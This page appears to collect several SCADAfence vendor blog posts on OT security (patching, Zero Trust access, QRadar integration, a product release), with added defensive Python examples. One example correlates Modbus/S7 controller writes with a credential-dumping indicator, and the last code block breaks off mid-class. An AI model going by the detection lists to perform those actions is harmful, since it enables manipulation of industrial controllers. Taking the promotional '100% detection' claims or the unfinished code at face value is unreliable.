Every standard OT security patching program starts with 4 steps to success. The first step is to detect and discover which assets you have within your OT environments. The next step is to assess the industrial devices and OT equipment for vulnerabilities. There can be different types of vulnerabilities, but most will fall under the categories of security risks or software and device misconfiguration.

The third step is to analyze and prioritize the vulnerabilities. Here is where organizations learn which devices are vulnerable and which are not, and what priority should be assigned to patching the vulnerable devices. In some cases, organizations will question at this step whether they should even patch the vulnerability or why they should care about it. While it is an organization's job to decide what to patch and what not to patch, we recommend patching all vulnerabilities to ensure the organization remains secure.

The fourth and final step is remediating the vulnerability. This is where security teams patch the vulnerabilities within their industrial devices, for example by patching a PLC, fixing device configurations and more.
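As an added illustration of the four steps above (not code from the original post or from SCADAfence), the following Python walks a constructed asset inventory through discovery, assessment, prioritization and a remediation decision. The asset records, the vulnerability identifiers (VULN-0001 and so on, which are placeholders rather than real CVEs), the scoring weights and the decision threshold are all assumptions chosen for the example; the risk formula is a simple severity-times-criticality product, not a published standard.

```python
"""Four-step OT patch management walk-through: discover, assess,
prioritize, remediate (added example; all data below is constructed)."""
from dataclasses import dataclass, field
from typing import List, Tuple


@dataclass
class Vulnerability:
    vuln_id: str             # placeholder identifier, not a real CVE
    cvss: float              # base severity, 0.0 to 10.0
    category: str            # "security_risk" or "misconfiguration"
    patch_available: bool
    network_reachable: bool  # can it be triggered over the OT network?


@dataclass
class Asset:
    name: str
    role: str                # "PLC", "HMI", "engineering_workstation", ...
    zone: str
    criticality: int         # 1 (low) to 5 (production or safety critical)
    vulns: List[Vulnerability] = field(default_factory=list)


def discover_assets() -> List[Asset]:
    """Step 1: a constructed inventory standing in for passive discovery."""
    return [
        Asset("plc-line1", "PLC", "cell-1", 5, [
            Vulnerability("VULN-0001", 9.8, "security_risk", True, True),
        ]),
        Asset("hmi-line1", "HMI", "cell-1", 4, [
            Vulnerability("VULN-0002", 7.5, "misconfiguration", False, True),
            Vulnerability("VULN-0003", 4.3, "security_risk", True, False),
        ]),
        Asset("eng-ws-01", "engineering_workstation", "dmz", 2, [
            Vulnerability("VULN-0004", 5.0, "security_risk", False, False),
        ]),
    ]


def assess(assets: List[Asset]) -> List[Tuple[Asset, Vulnerability]]:
    """Step 2: pair every asset with each vulnerability found on it."""
    return [(asset, vuln) for asset in assets for vuln in asset.vulns]


def risk_score(asset: Asset, vuln: Vulnerability) -> float:
    """Step 3 (assumed formula): severity weighted by how critical the
    asset is, halved when the flaw is not reachable over the network."""
    reach = 1.0 if vuln.network_reachable else 0.5
    return round(vuln.cvss * asset.criticality * reach, 1)


def decide(asset: Asset, vuln: Vulnerability, threshold: float = 20.0) -> str:
    """Step 4 input: patch now, apply a workaround (isolate the device or
    tighten ACLs when no patch exists), defer to the next maintenance
    window, or accept the residual risk. The threshold is an assumption."""
    score = risk_score(asset, vuln)
    if score >= threshold:
        return "patch" if vuln.patch_available else "workaround"
    return "patch-next-window" if vuln.patch_available else "accept"


def prioritize(assets: List[Asset]) -> List[Tuple[float, str, str, str]]:
    """Highest risk first: (score, asset name, vulnerability id, decision)."""
    rows = [(risk_score(a, v), a.name, v.vuln_id, decide(a, v))
            for a, v in assess(assets)]
    return sorted(rows, reverse=True)


if __name__ == "__main__":
    for score, asset, vuln_id, action in prioritize(discover_assets()):
        print(f"{score:5.1f}  {asset:12}  {vuln_id}  -> {action}")
```

The ordering that falls out of the constructed data is the point: the reachable flaw on the critical PLC is patched first, the unpatchable HMI misconfiguration gets a workaround rather than being ignored, and the low-scoring items are scheduled or accepted with a recorded reason instead of silently dropped.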

IT Patching Does Not Work in OT 

Today’s organizations need to run different security tests to clearly understand which vulnerabilities they have in their OT environments. In IT security, most organizations adopt vulnerability scanning tools. Asset vulnerability scans typically assess devices by enumerating ports and authenticating to the devices to collect comprehensive configuration, policy and registry information. While this might be useful for IT security, it does not work for OT security.

For example, an automotive manufacturer in Germany had a couple of critical servers connected to their production line. Their servers crashed after a vulnerability scan. They only scanned to check whether they had one specific vulnerability in their environment. While they knew exactly what they were scanning for, the scan still affected their OT environment. The servers were a key part of their manufacturing process, and the failure caused downtime and a loss of revenue of over a million dollars.

When they investigated the problem, they identified that the scanner opened 13 sockets while the servers only supported up to four sockets in parallel. The scan flooded the servers with more than three times the load they were designed for. The servers were unable to handle their operational processes and crashed.

The lesson learned from this example is that if you bring an IT security approach of scanning for vulnerabilities to OT, an organization might cause more damage than a cyber attack would.

Don’t Forget about the Costs

Now that organizations know the four-step process of device patch management, the cost of patching is a crucial aspect they must be aware of. Once organizations have all the information (asset inventory, network mapping, disclosure sources and maps of vulnerabilities) and are ready to patch the vulnerabilities, they need to understand the price of patching.

Each patching process has a different cost associated with it, and it should not be taken lightly. Every industrial organization’s biggest nightmare is production downtime. With every patching process, the organization will experience some kind of downtime, but when managed correctly, it will only be for a short period of time. However, when an organization does not manage the industrial device management process correctly, it can financially impact the organization, not only on the production line but also in the headlines.

At SCADAfence, we have helped many industrial organizations patch their OT devices. One common theme we have seen is that when we show an organization its different vulnerabilities, it fixes only that vulnerability and does not fix the entire vulnerable device. This is a huge problem, because if an organization does not fix the core issue behind a vulnerability, it will be easy for attackers to find another one. Organizations need to patch the entire device to ensure no vulnerabilities are left behind.

Industrial Device Patching Comes with Benefits  

Now that we have explained the risks and cost impact of improper patching methods, organizations should consider the benefits. While patching OT devices can be risky, since devices and servers may crash and cause downtime, there is a real benefit to patching.

One of the biggest benefits that organizations experience is having an asset inventory, which is a great place to start. Adopting an automatic asset inventory provides the most efficient and accurate way to visually manage an organization’s industrial devices and understand whether there are vulnerabilities in those devices. Mapping vulnerabilities to assets allows organizations to prioritize the patching of vulnerable devices and increases visibility into the connection points of each device on the OT network.

In addition, we recommend isolating vulnerable devices from the OT network. In some cases, an OT device will have a vulnerability for which no patch is available. This can result from the protocols of a specific industrial device having overly lenient restrictions, which makes the device more vulnerable. Isolating vulnerable devices helps prevent attackers from moving laterally within the OT environment.

Simplifying Industrial Device Management

Moving forward, organizations need to assume that there are always unpatched devices in their OT networks, either because they cannot be patched or because they have not been patched yet. If organizations adopt a concrete industrial device patch management strategy, their security teams will be able to efficiently detect vulnerabilities and attacks early on, before attackers exploit the devices.

The answer to the question “to patch or not to patch” is not a simple yes or no.

We recommend adopting an industrial device patching approach based on actual trial testing with different scenarios. Understanding real-time device data and vulnerability information allows organizations to prioritize their patching of industrial devices.

To learn more about industrial device patching, on November 10th at 11 am EST, Rapid7 and SCADAfence will host a joint webinar: The Comprehensive Guide to Industrial Device Patching. 

During the webinar, we will provide three excellent tools that will help you with the decision-making process of whether “to patch, workaround or do nothing.”


Implementing Zero Trust Security in OT Environments

In 2021, the increasing number of cyber security attacks on major critical infrastructure operators grabbed the headlines. The successful attacks targeted different industrial sectors such as oil pipelines, food manufacturers, and water and wastewater facilities. Up until these attacks occurred, the media and the industrial sectors paid little attention to the cybersecurity of critical infrastructure. 


Now that organizations and analysts are becoming more aware of the different risks and vulnerabilities in critical infrastructure and OT environments, it is becoming more visible how much impact these risks have on our daily lives. The recent increase in attacks on the different industrial sectors is finally receiving attention, including at the highest levels of several governments.

In May 2021, the President of the United States Joe Biden issued an Executive Order on improving the nation’s cybersecurity with a clear focus on critical infrastructure. As stated, “The scope of protection and security must include systems that process data (information technology (IT)) and those that run the vital machinery that ensures our safety (operational technology (OT)).”

While this is a great first step in advancing OT security, it is simply not enough. The different risks are due to three key factors. First, more critical infrastructure operators are digitalizing their equipment and environments, which is making their organizations more vulnerable to cyber attacks. Second, the trend of converging IT and OT to be more interconnected has resulted in IT exploitation affecting OT environments. Last but not least, cyber criminals and nation-state attackers are attacking more aggressively by adopting more sophisticated tactics to exploit industrial control systems (ICS).

The Growing OT Attack Surface 

As operational technology (OT) networks are becoming increasingly connected to an organization’s network infrastructure, older strategies such as ‘air gapping’ are no longer relevant or feasible. 

Many organizations think IT security best practices are the answer and will search for IT security solutions that could possibly integrate with their OT environments. This is the wrong approach to gaining visibility and threat detection in OT networks. OT networks need a specifically designed solution that can detect security risks to avoid the exploitation of critical infrastructure. Deploying the wrong kind of solution within an OT environment can cause problems for the OT network, such as downtime, false-positive alerts and more.

Instead, organizations should deploy OT security solutions that are designed and integrated with Zero Trust capabilities. This is the idea of denying access to users, devices and equipment that lack the proper identification and permissions. So how does the Zero Trust model relate to OT networks?

Zero Trust For OT Networks


Diagram 01: The SCADAfence Einstein Baseline’s Sensitivity Dashboard 

The Zero Trust motto is “never trust, always verify” and this is especially true when creating security controls in OT networks and devices. 

Many OT devices and systems are still using unencrypted and unauthenticated protocols. However, it is not just the devices. Too often, OT teams are not open to the idea of connecting their once-isolated systems or PLCs to the Internet, even when those systems are implemented with encryption and authentication. As more IT and OT systems open their gates to connect to the Internet, the need to adopt the principle of least privilege is more aligned with the expanding threat landscape.

Organizations need to look at OT security solutions that can provide policy-based access for authorized users. This is the approach that only OT teams or other specific users should have access to OT environments. Simply put, only employees who need access to OT networks and devices to do their day-to-day job should have access. 

Enforcing access controls from the outset, based on the principle that no one should be able to connect unless authorized, means that security teams grant access only after verification. Each user and device access request needs to be verified, and only then is access granted to the authorized user.

Implementing the Zero Trust security model with granular access authorization assures organizations that the proper access is being granted in OT environments, with an additional level of security. By restricting who has access to which network or device, the Zero Trust model helps minimize the attack surface amid the increasing risks within an OT environment.

Additionally, enforcing MFA (multi-factor authentication) is another essential Zero Trust capability for OT leaders to implement alongside role-based access. With MFA, access is only granted after the user successfully presents two or more pieces of evidence, or factors, to an authentication mechanism. These factors provide an additional layer of security against unauthorized access to OT environments.
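The policy-based, default-deny access model described in the last few paragraphs, as an added Python example (not code from the original post or from the SCADAfence Platform): every request must come from an enrolled device, carry a satisfied MFA check, and match the role's access group for the target zone and action, and the first failing check becomes the logged reason for denial. The roles, zones, device identifiers and user names are constructed for the illustration.

```python
"""Zero Trust access decisions for OT zones (added example, constructed
policy). Default deny: a request passes only when the device is enrolled,
MFA was satisfied, and the role's access group allows the action in that
zone."""
from dataclasses import dataclass
from typing import Dict, FrozenSet, List, Tuple


@dataclass(frozen=True)
class AccessRequest:
    user: str
    role: str
    device_id: str
    mfa_verified: bool
    target_zone: str
    action: str          # "read" (monitor) or "write" (change the process)


# Constructed access groups: role -> zone -> permitted actions.
# Nothing outside this table is ever allowed.
ACCESS_GROUPS: Dict[str, Dict[str, FrozenSet[str]]] = {
    "ot_engineer": {
        "cell-1": frozenset({"read", "write"}),
        "cell-2": frozenset({"read"}),
    },
    "ot_operator": {"cell-1": frozenset({"read"})},
    "it_analyst": {"dmz": frozenset({"read"})},
}

# Constructed list of managed devices allowed to reach OT zones at all.
ENROLLED_DEVICES = frozenset({"ews-01", "ews-02", "soc-laptop-07"})


def evaluate(req: AccessRequest) -> Tuple[bool, str]:
    """Return (granted, reason). Every check must pass; the first failing
    check explains the denial so it can be logged and reviewed."""
    if req.device_id not in ENROLLED_DEVICES:
        return False, "device not enrolled"
    if not req.mfa_verified:
        return False, "MFA not satisfied"
    zones = ACCESS_GROUPS.get(req.role)
    if zones is None:
        return False, f"role {req.role} has no access group"
    permitted = zones.get(req.target_zone)
    if permitted is None:
        return False, f"zone {req.target_zone} not in access group"
    if req.action not in permitted:
        return False, f"action {req.action} not permitted in {req.target_zone}"
    return True, "granted"


def audit(requests: List[AccessRequest]) -> List[Tuple[str, bool, str]]:
    """Evaluate a batch and return (user, granted, reason) audit rows."""
    return [(r.user, *evaluate(r)) for r in requests]


SAMPLE_REQUESTS = [  # constructed
    AccessRequest("alice", "ot_engineer", "ews-01", True, "cell-1", "write"),
    AccessRequest("alice", "ot_engineer", "ews-01", False, "cell-1", "write"),
    AccessRequest("bob", "ot_operator", "ews-02", True, "cell-2", "read"),
    AccessRequest("carol", "it_analyst", "soc-laptop-07", True, "dmz", "write"),
    AccessRequest("dave", "ot_engineer", "byod-phone", True, "cell-1", "read"),
]

if __name__ == "__main__":
    for user, granted, reason in audit(SAMPLE_REQUESTS):
        print(f"{user:6} {'ALLOW' if granted else 'DENY ':5} {reason}")
```

Note that the same engineer is denied the moment the MFA factor is missing, and that an unmanaged device is rejected before the role is even consulted: the order of checks is what makes the policy "never trust, always verify" rather than "trust the role".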

While integrating even a basic Zero Trust framework is not a simple task across complex environments like OT networks, rethinking the security approach around the Zero Trust framework is the right step in protecting critical infrastructure and OT environments.

SCADAfence Offers Zero Trust Capabilities for OT Environments 


Diagram 02:  The SCADAfence Einstein Baseline’s Unique Zero Trust Capabilities

SCADAfence is the only OT security vendor offering an OT network security solution that integrates with the Zero Trust model for industrial environments. The SCADAfence Platform enables users to define access-group segmentation and to enforce Zero Trust capabilities in their OT networks. Users can gain full visibility of their production networks which are designed and supported by the Zero Trust security framework. 

With the industry-leading Einstein baseline, the SCADAfence Platform learns an entire industrial network in less than 2 days. This includes learning all traffic patterns, asset behavior and network subnets. The Platform is able to immediately send alerts on any anomalies or deviations from the normal network behavior.

When the Zero Trust model is enabled during the Einstein baseline period, the Platform not only displays and alerts users of all the activities and devices on the network, but all network behaviors are treated as potentially malicious until further verified.
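To make the difference between the two baseline modes concrete, here is an added Python sketch of the concept (it is an illustration of the behavior described above, not the Einstein baseline's own code or algorithm). In standard mode, conversations seen during the learning window silently become the baseline and only later deviations alert; in Zero Trust mode, everything seen during learning stays pending until an operator verifies it, so unverified behavior is alerted on from the first packet. The hosts, protocols and traffic are constructed.

```python
"""Baseline learning with an optional Zero Trust mode (added example,
constructed traffic). A conversation is (source, destination, protocol)."""
from dataclasses import dataclass
from typing import List, Set, Tuple

Conversation = Tuple[str, str, str]


@dataclass(frozen=True)
class Flow:
    src: str
    dst: str
    proto: str                          # e.g. "modbus", "s7comm", "https"

    def key(self) -> Conversation:
        return (self.src, self.dst, self.proto)


class Baseline:
    def __init__(self, zero_trust: bool = False) -> None:
        self.zero_trust = zero_trust
        self.learning = True
        self.trusted: Set[Conversation] = set()
        self.pending: Set[Conversation] = set()

    def observe(self, flow: Flow) -> List[str]:
        """Feed one flow; return alert messages (empty list when normal)."""
        conv = flow.key()
        if conv in self.trusted:
            return []
        if self.learning:
            if self.zero_trust:
                # Seen, but not trusted until someone verifies it.
                self.pending.add(conv)
                return [f"unverified conversation {conv} awaiting approval"]
            self.trusted.add(conv)      # classic baseline: learn silently
            return []
        return [f"deviation from baseline: {conv}"]

    def approve(self, conv: Conversation) -> None:
        """Operator verification moves a pending conversation into the baseline."""
        self.pending.discard(conv)
        self.trusted.add(conv)

    def finish_learning(self) -> None:
        self.learning = False


# Constructed sample traffic: routine HMI/PLC polling, then a laptop that
# was never part of the baseline talking Modbus to a PLC.
LEARNING_TRAFFIC = [
    Flow("hmi-1", "plc-line1", "modbus"),
    Flow("hmi-1", "plc-line2", "modbus"),
    Flow("historian", "plc-line1", "s7comm"),
]
LIVE_TRAFFIC = LEARNING_TRAFFIC + [Flow("laptop-9", "plc-line1", "modbus")]


def run(zero_trust: bool) -> List[str]:
    """Learn from LEARNING_TRAFFIC, then monitor LIVE_TRAFFIC; return alerts."""
    baseline = Baseline(zero_trust=zero_trust)
    learn_alerts = [a for f in LEARNING_TRAFFIC for a in baseline.observe(f)]
    if zero_trust:
        # Assume the operator reviews and approves everything seen in the
        # learning window; the laptop flow only shows up afterwards.
        for conv in list(baseline.pending):
            baseline.approve(conv)
    baseline.finish_learning()
    live_alerts = [a for f in LIVE_TRAFFIC for a in baseline.observe(f)]
    return learn_alerts + live_alerts


if __name__ == "__main__":
    print("standard:", run(zero_trust=False))
    print("zero trust:", run(zero_trust=True))
```

The practical consequence is visible in the counts: standard mode is quiet during learning and raises one alert for the laptop, while Zero Trust mode raises one alert per learned conversation until each is approved, which is the cost of not trusting whatever happened to be on the wire during the learning window.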

As we continue to advance our leading OT security platform with more security features and capabilities, SCADAfence users continuously have more flexibility to manage their OT environments. Our latest integration of Zero Trust capabilities will guide users with an additional level of security from the baseline stage to the ongoing security management stage and onward.

To learn more about SCADAfence’s Zero Trust capabilities for OT networks, schedule a demo with one of our experts here: https://l.scadafence.com/demo


Integrating IBM QRadar SIEM with SCADAfence for Complete OT Visibility

CISOs and security teams face an uphill battle when it comes to detecting and mitigating ever more frequent and sophisticated cyber threats, especially in OT environments.

Cyber attackers are learning new tactics, getting more creative, and are becoming more relentless than ever to exploit industrial organizations. As seen in the Oldsmar water system attack and the Colonial Pipeline ransomware attack, adversaries are targeting IT and OT environments to inflict damage on organizations that can affect the daily lives of civilians.

Considering the evolving and ever-expanding threat landscape, security and incident response teams might feel lost at times when defending their OT networks. Even more so with the recent increasing convergence of IT and operational technology (OT) threats, industrial organizations are seeking new practices for leveraging their existing IT security stack to address the new cyber threats targeting OT environments.

This is where SCADAfence and IBM QRadar have partnered to create a joint integration that tackles OT security challenges. Security teams using IBM QRadar can now be provided with the visibility and security required for adopting advanced Industrial IoT and OT technologies. This new integration with QRadar allows users to simply feed alerts from the SCADAfence Platform into their QRadar feed, as well as view them in a dedicated SCADAfence dashboard.
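As an added example of the mechanics behind feeding OT alerts into a QRadar feed (illustrative code, not the SCADAfence app's own wire format or the page's code): an alert is serialized as a LEEF event, the log format QRadar parses natively, and wrapped in a syslog line for the collector. The vendor and product strings are taken from the page, the version string, the alert fields, the IP addresses and the collector name are assumptions constructed for the example.

```python
"""Forwarding an OT alert to QRadar as a LEEF 1.0 event over syslog
(added example; the alert below is constructed)."""
import socket
from datetime import datetime
from typing import Dict

LEEF_VENDOR = "SCADAfence"
LEEF_PRODUCT = "Platform"
LEEF_VERSION = "1.0"          # placeholder, not an actual product version


def _clean(value: object) -> str:
    """LEEF 1.0 uses '|' in the header and tabs between attributes, so
    neither may appear inside a value."""
    return str(value).replace("\t", " ").replace("\n", " ").replace("|", "/")


def to_leef(alert: Dict[str, object]) -> str:
    """Build 'LEEF:1.0|Vendor|Product|Version|EventID|key=value<TAB>...'."""
    header = "|".join(["LEEF:1.0", LEEF_VENDOR, LEEF_PRODUCT, LEEF_VERSION,
                       _clean(alert["event_id"])])
    when = alert["time"]
    attrs = {
        "devTime": when.strftime("%b %d %Y %H:%M:%S"),
        "devTimeFormat": "MMM dd yyyy HH:mm:ss",   # Java date pattern QRadar expects
        "sev": alert["severity"],                  # 1 (low) to 10 (critical)
        "cat": alert["category"],
        "src": alert["src_ip"],
        "dst": alert["dst_ip"],
        "dstPort": alert["dst_port"],
        "proto": alert["protocol"],
        "msg": alert["description"],
    }
    return header + "|" + "\t".join(f"{k}={_clean(v)}" for k, v in attrs.items())


def to_syslog(leef: str, hostname: str, when: datetime) -> bytes:
    """Wrap in a BSD syslog line: facility user (1), severity warning (4)."""
    pri = 1 * 8 + 4
    return f"<{pri}>{when:%b %d %H:%M:%S} {hostname} {leef}".encode()


def send_udp(message: bytes, collector: str, port: int = 514) -> None:
    """Ship one event to the QRadar event collector over UDP syslog."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.sendto(message, (collector, port))


SAMPLE_ALERT: Dict[str, object] = {   # constructed
    "event_id": "UnauthorizedWrite",
    "time": datetime(2021, 11, 10, 11, 0, 0),
    "severity": 9,
    "category": "OT Manipulation",
    "src_ip": "10.10.5.23",
    "dst_ip": "10.10.1.10",
    "dst_port": 502,
    "protocol": "modbus",
    "description": "Write to holding register from host outside baseline",
}

if __name__ == "__main__":
    line = to_leef(SAMPLE_ALERT)
    print(to_syslog(line, "scadafence-01", SAMPLE_ALERT["time"]).decode())
    # send_udp(to_syslog(line, "scadafence-01", SAMPLE_ALERT["time"]),
    #          "qradar-collector.example.internal")   # placeholder collector
```

Two details matter in practice: the `devTime`/`devTimeFormat` pair lets QRadar keep the time the sensor saw the event rather than the time the collector received it, and stripping the header and attribute delimiters from free-text fields such as the description prevents a description containing `|` or a tab from breaking the parse of every field after it.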


Diagram 01. The SCADAfence & IBM QRadar integration dashboard

Many industrial organizations count on IBM Security QRadar, an intelligent SIEM, to provide actionable threat intelligence to help detect and respond to security incidents that need to be mitigated. SCADAfence’s integration with IBM QRadar allows our joint customers to capitalize further on their current security stack, so they can have complete visibility into their OT networks with real-time alerts, all in one user-friendly dashboard.

Leveraging SCADAfence and IBM QRadar

CISOs and their organization are always looking to enable their IT and security teams to detect and respond to security incident events more efficiently, but they also want to simplify how to address the lack of visibility into the security of OT environments at the same time. At SCADAfence, we believe we can achieve more through collaboration and integrations. Organizations can leverage SCADAfence’s OT security platform and alerting with QRadar’s strengths across all their industrial OT and IIoT environments to provide complete OT visibility and threat detection to respond to security incidents all in one dashboard.


Diagram 02. The SCADAfence & IBM QRadar integration alerts dashboard

Complete OT Network Visibility 

SCADAfence’s leading OT security platform is configured to minimize any interruption to the normal operation of the customer environment and provides OT insights and produces risk management recommendations that are appropriate to your organization’s needs. This is accomplished by discovering the assets and their roles in the network which provides visibility into their behavior. With a wide range of algorithms and mechanisms, the SCADAfence Platform detects anomalies that can compromise security, safety and reliability.

Multi-Layered Approach to OT Defense

Easily integrate the benefits of the SCADAfence Platform to provide endpoint controls with behavioral indicators of compromise across endpoints and operational networks. This will allow IBM QRadar users to have the visibility to respond across IIoT and OT environments, all within a single dashboard. This integration empowers customers with SCADAfence’s OT security technology while providing the needed visibility into OT equipment.

Automated Asset Inventory 

The SCADAfence Platform lets IBM QRadar customers automatically discover their asset inventory and keep it continuously up to date, with detailed information on every device connected to their OT networks. Regardless of the vendors and controllers deployed in the infrastructure, the platform builds the inventory automatically, without needing any prior knowledge of the environment.

Efficient Detection of Incidents

With IBM QRadar and SCADAfence, users can correlate network traffic behavior with host and user behavior across multiple network areas, surface critical events, and detect incidents spanning machines and networks that would previously have gone undetected. The automatic correlation of OT manipulation commands (writes to controllers, configuration and logic changes) with indications that the originating host is compromised lets teams react quickly and block further propagation of an attack precisely, rather than broadly.
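The correlation described above, as an added example that is not SCADAfence’s or IBM’s code: host-side indications of compromise (the kind an EDR forwards to the SIEM) are joined with OT network events from the same source host, and a controller write that follows a host indicator within a short window is raised as a high-severity incident. The event layout, field names, the 30-minute window, the S7comm function names and all sample records are constructed for illustration.

```python
"""Correlate OT manipulation commands with compromised-host indications.

Added example (not SCADAfence or IBM QRadar code). The event layout, field
names, the window size and the sample records are constructed assumptions.
"""
from datetime import datetime, timedelta

# Modbus function codes that change controller state (coil/register writes).
MODBUS_WRITE_CODES = {5, 6, 15, 16, 22, 23}
# S7comm operations treated as manipulation; these names are assumptions.
S7_WRITE_FUNCTIONS = {"write_var", "plc_stop", "download_block"}
# A host indicator older than this is not tied to a later OT write.
CORRELATION_WINDOW = timedelta(minutes=30)

# Constructed host-side indications, as an EDR might forward them to the SIEM.
HOST_EVENTS = [
    {"ts": "2021-11-03T08:55:00", "host_ip": "10.1.2.50",
     "indicator": "credential dumping (lsass access)"},
    {"ts": "2021-11-03T06:40:00", "host_ip": "10.1.2.60",
     "indicator": "suspicious scheduled task"},
]
# Constructed OT network events, as the OT monitor might forward them.
OT_EVENTS = [
    {"ts": "2021-11-03T09:12:00", "src_ip": "10.1.2.50", "dst_ip": "10.1.10.7",
     "protocol": "modbus", "function_code": 16},   # write multiple registers
    {"ts": "2021-11-03T09:13:00", "src_ip": "10.1.2.50", "dst_ip": "10.1.10.7",
     "protocol": "modbus", "function_code": 3},    # read holding registers
    {"ts": "2021-11-03T09:15:00", "src_ip": "10.1.2.20", "dst_ip": "10.1.10.7",
     "protocol": "modbus", "function_code": 6},    # legitimate HMI write
    {"ts": "2021-11-03T09:20:00", "src_ip": "10.1.2.60", "dst_ip": "10.1.10.8",
     "protocol": "s7comm", "function": "write_var"},  # IOC too old to match
]


def is_manipulation(ev):
    """True when the OT event changes controller state rather than reading it."""
    if ev["protocol"] == "modbus":
        return ev.get("function_code") in MODBUS_WRITE_CODES
    if ev["protocol"] == "s7comm":
        return ev.get("function") in S7_WRITE_FUNCTIONS
    return False


def correlate(host_events, ot_events, window=CORRELATION_WINDOW):
    """Return incidents: OT writes issued by a host that showed an IOC shortly before."""
    iocs_by_host = {}
    for h in host_events:
        iocs_by_host.setdefault(h["host_ip"], []).append(
            (datetime.fromisoformat(h["ts"]), h["indicator"]))

    incidents = []
    for ev in ot_events:
        if not is_manipulation(ev):
            continue                      # reads never escalate on their own
        t = datetime.fromisoformat(ev["ts"])
        for ioc_ts, indicator in iocs_by_host.get(ev["src_ip"], []):
            age = t - ioc_ts
            # Only an IOC that precedes the write, and not by more than the
            # window, is treated as evidence that the write came from an attacker.
            if timedelta(0) <= age <= window:
                incidents.append({
                    "ts": ev["ts"], "src_ip": ev["src_ip"], "target": ev["dst_ip"],
                    "protocol": ev["protocol"], "indicator": indicator,
                    "severity": "high",
                })
    return incidents


if __name__ == "__main__":
    for inc in correlate(HOST_EVENTS, OT_EVENTS):
        print(inc)
```

On the sample data only the write from 10.1.2.50 to 10.1.10.7 becomes an incident: the read from the same host is ignored, the HMI’s write has no host indicator behind it, and 10.1.2.60’s indicator is hours old. The write-code set and the window are the tuning knobs; writes with no matching indicator still deserve a baseline comparison, which is the job of the anomaly detection rather than this rule.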

Proactive Operational Insights

The SCADAfence Platform continuously alerts IBM QRadar users to abnormal behavior or configuration changes that could affect operational stability, before they actually disrupt operations. Drawing on current OT security research, the platform pairs its alerts with recommendations on how to remediate the OT vulnerabilities that may affect your environment.


Diagram 03. The SCADAfence & IBM QRadar integration log activity dashboard

Discover the instant value of OT security in your QRadar environment. Mutual customers with an active subscription to SCADAfence can go to the IBM Security App Exchange and download SCADAfence Platform integration for IBM QRadar.

About Version 2 Digital

Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About SCADAfence
SCADAfence helps companies with large-scale operational technology (OT) networks embrace the benefits of industrial IoT by reducing cyber risks and mitigating operational threats. Our non-intrusive platform provides full coverage of large-scale networks, offering best-in-class detection accuracy, asset discovery and user experience. The platform seamlessly integrates OT security within existing security operations, bridging the IT/OT convergence gap. SCADAfence secures OT networks in manufacturing, building management and critical infrastructure industries. We deliver security and visibility for some of world’s most complex OT networks, including Europe’s largest manufacturing facility. With SCADAfence, companies can operate securely, reliably and efficiently as they go through the digital transformation journey.

Driven by Innovation, SCADAfence Unveils Its Largest Product Release to Date

Over time, we have learned that we develop products not for our own innovation, but for you the customers, to help improve your OT security. In 2021, we were excited to launch three newly designed products that include many new features that will improve your OT security experience.

We launched the SCADAfence Platform 6.6, Governance Portal 2.0 and Multi-Site Portal 2.6. These versions are meant to keep our industrial cybersecurity products at the front of the field in detection and response for large-scale OT networks, asset discovery and governance. New features include support for the MITRE ATT&CK for ICS framework, many new security alerts, improvements to our detection technology, enhanced reporting, new zero trust capabilities and more.

With the combination of our additional new funding, hiring top experts in R&D & the executive team, 2021 has truly been an amazing year for SCADAfence. We have strengthened our leading OT security offering to provide the most advanced and cutting-edge technology in the OT security industry.

After months of extensive testing by internal and external research teams, SCADAfence Platform version 6.6 consistently demonstrated best-in-class performance, with 100% detection and close to zero false positives in those tests.

Current customers can upgrade their SCADAfence Platform to the latest version and see the new features in action. But let’s take a closer look at the main new features, with some screenshots.

Designed for our users, by our users

After talking to our rapidly expanding customer base about how to make their user experience as efficient as possible, it was time for a further optimized UI design. We’ve updated all of our products’ user interfaces with a smoother, sleeker feel, designed for ease of use based on customer feedback.

Our new UI will allow our customers and their OT security teams to easily manage their OT environments while navigating through the platform.


Diagram 01. The SCADAfence Platform’s Assets Manager dashboard

The ‘Einstein’ Baseline

We’ve always prided ourselves on having the most advanced baseline technology in the industry, with over 40% more accuracy than other solutions in the OT security market. According to Gartner’s Vam Voster, “SCADAfence’s self-tuning baseline minimizes false positives; this means that no user configuration is required, nor is any stop-and-restart needed to relearn. This system allows for a scalable solution for a huge organization and seamless integration with OT networks.”

With the SCADAfence Platform, our customers’ baseline period takes just two days, whereas competing products tend to take up to six weeks. Beyond the short learning period, we wanted to make our baseline even more accurate, so we are excited to introduce the new ‘Einstein’ baseline.

Unlike other OT security solutions, SCADAfence’s new ‘Einstein’ baseline continuously updates as it learns from the latest network traffic, and it “forgets” old behavior that is no longer relevant to the customer’s environment and systems. Behavior is therefore not whitelisted forever just because it was observed once: new malicious behavior is detected and visibility into the network improves, even where the environment was already infected or compromised during the initial learning phase.

In addition, network behavior changes legitimately when a process or piece of network equipment changes, and the baseline adapts to these changes as well instead of raising alerts indefinitely.

This is a major improvement in the accuracy of the detection, and coping with dynamic networks.
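To make the forgetting behavior concrete, here is an added example that is not SCADAfence’s ‘Einstein’ implementation: a baseline keyed on (source, destination, protocol, function) that learns silently for a fixed period, alerts on keys it has not seen afterwards, and drops any key not observed within a retention window. The two-day learning period is the figure given above; the 14-day retention window, the key fields, the IP addresses and the traffic scenario are assumptions made for the illustration. The scenario also shows the limitation the text alludes to: a host that was already compromised during learning is treated as normal until its behavior has been absent long enough to be forgotten.

```python
"""Adaptive OT baseline with forgetting (added example, not SCADAfence code).

Learning period follows the 2-day figure from the text; the retention window,
key fields and traffic scenario are constructed assumptions.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta

LEARNING_PERIOD = timedelta(days=2)   # from the text: baseline period of two days
FORGET_AFTER = timedelta(days=14)     # assumed: behaviour unseen this long is dropped


@dataclass
class Flow:
    ts: datetime
    src: str
    dst: str
    proto: str
    function: str

    def key(self):
        """The conversation attributes the baseline tracks (an assumption)."""
        return (self.src, self.dst, self.proto, self.function)


class AgingBaseline:
    def __init__(self, start, learning=LEARNING_PERIOD, forget_after=FORGET_AFTER):
        self.learning_until = start + learning
        self.forget_after = forget_after
        self.last_seen = {}   # key -> datetime of the most recent observation
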